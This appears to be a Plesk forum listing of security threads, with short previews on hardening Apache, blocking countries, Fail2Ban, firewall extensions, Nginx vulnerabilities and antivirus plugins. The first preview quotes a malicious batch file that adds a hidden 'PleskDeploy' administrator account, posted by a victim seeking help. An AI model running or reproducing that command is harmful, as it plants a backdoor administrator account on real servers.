security

in my windows server with plesk obsidian and mssql 2019 I feel like I've been attacked by malware. There are two files in the C:\ProgramData\Application\Windows. File named runtime.bat with the following content: net user PleskDeploy 123_Hoho /add & net localgroup administrators PleskDeploy...

Hello We are excited to announce the release of our new plugin Deny-Country for plesk: Deny-country - Plesk Extensions With this extension you will be able to: - Limit / deny general access of your website per country (Very useful to avoid intensive access from a specific country that can...

Following my security path before to submit the system to a penetration test I find that I should disable this feature in Apache TraceEnable off though I haven't found any article related to Plesk, where should I put this config? in the httpd.conf? or is something that Plesk has already...

Hello everyone, we are going to submit out system to a penetration testing and we are trying to fix some minor problems before to do it but I have some problems with this configuration for Apache ServerTokens ProductOnly ServerSignature Off Header set X-XSS-Protection "1; mode=block" Header...

I run a virtual server and register more and more attacks from Asia. Especially from China and via a provider called DigitalOcean. What is the easiest way to block an entire country in Plesk? With htaccess I can only block access to a single website. And the file has to be read every time a...

I am contemplating the installation of the Plesk Firewall extension, where I can see that Policies and Rules can be set as to restrict access to a server based on IP. Firstly, what is the difference between restricting access by IP within 'Plesk's Firewall Extension' and within 'Tools &...

Dear fellow Pleskians, Following quite a few hours of reading posts on this forum, and the Plesk docs (Protection Against Brute Force Attacks (Fail2Ban)), and a few interesting technical chats with more experienced people, I've significantly reduced the no of IPs hammering my server. Now I...

Hi! :) Plesk has many security extensions, many! Could you tell me which is the best investment to sleep well at night? What is the best combination of extensions to be completely covered? Thank you! :D

Hi! :) I've been working with servers and plesk for two years, but learning from tutorials. Now I'm going to set up my own dedicated server, but I'm pretty scared about security. There are tutorials that say I need to install ClamAV and RKhunter on my server, regardless of the security of...

Hi; As a newbie to VPS and Plesk, I tried to secure my server following the tutorials. But when I started by changing the port in sshd_config, I got connection refused. I reinstalled my VPS, started from zero and each time I get some kind of error. All I want is to sleep comfortably knowing that...

Via Plesk, we provide (and so have users that prefer to use) Roundcube Webmail. There's already a lot of very helpful Plesk pages, which we've used previoulsy, to make this even more secure than the default settings it is provided with. The quickest way to make all these modifications in our...

I have a bunch of sites setup in Plesk. Most of them are running MSSQL hosted by the same server. Each database is supplied with it's own MSSQL login credentials. This allows me to connect to each database remotely. I disabled the sa account because it's extremely bad practice to expose this...

A couple of days ago, Nginx identified some issues which they have fixed by releasing a stable version of 1.14.1 Subsequently, Ubuntu have identified these security issues affect their own OS Nginx packages on these releases: Ubuntu 18.10 Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 LTS The...

Hi to everyone, I want to let you know that i seeing a situation about the Webmail subdomain. When i activating a new SSL certificate to my webmail. Then the https will not be activated automaticly by Plesk Onyx. Regards, Edward

Hi everyone! We're excited to get back with a significant update of Revisium Antivirus 2.0-17. What's new? * Now it's available in three versions: Free, Premium and Shared Hosting editions. * Free edition is still a full-featured malware file scanner and domain reputation checker; no trials...

Hello, I just wanted to follow this cool Advisor feature, and fix all suggestions one by one. Untill now I thought that all my WordPress instances are secured, because status on all instances was "secured". But after security scanning, I got "Danger" status, reported only file permissions...

The Nginx version that is bundled with Plesk is the very out-dated 1.11.1 (31 May 2016) and needs updating for fixes for vulnerability CVE-2017-7529 and a long list of bugs. See https://talk.plesk.com/forums/plesk-suggestions-and-feedback.676/create-thread Recommended is updating to the latest...

Hey there, often large Companies with lot's of Workstation are getting blocked because 1 Client in their Office is trying to log in with wrong Password (imap/pop/smtp) - then the whole Office of them is getting blocked and the search which PC/which User is causing the block.starts ... It would...

I've searched for over 30 minutes with no answers anywhere online. What I want to do is enable Cloudflare on my Plesk login subdomain to receive all the security protections Cloudflare provides, however when doing this only Cloudflare IPs are recognized by Plesk and I get locked out. I can't...

Hello, I have installed Slave DNS Manager Extension and set it up successfully. Everything is working great. But, there is only one thing that bothers me. When I run DNS test on mxtoolbox.com it warns "Open Zone Transfer Detected" for Slave Server. I followed the exact instructions that...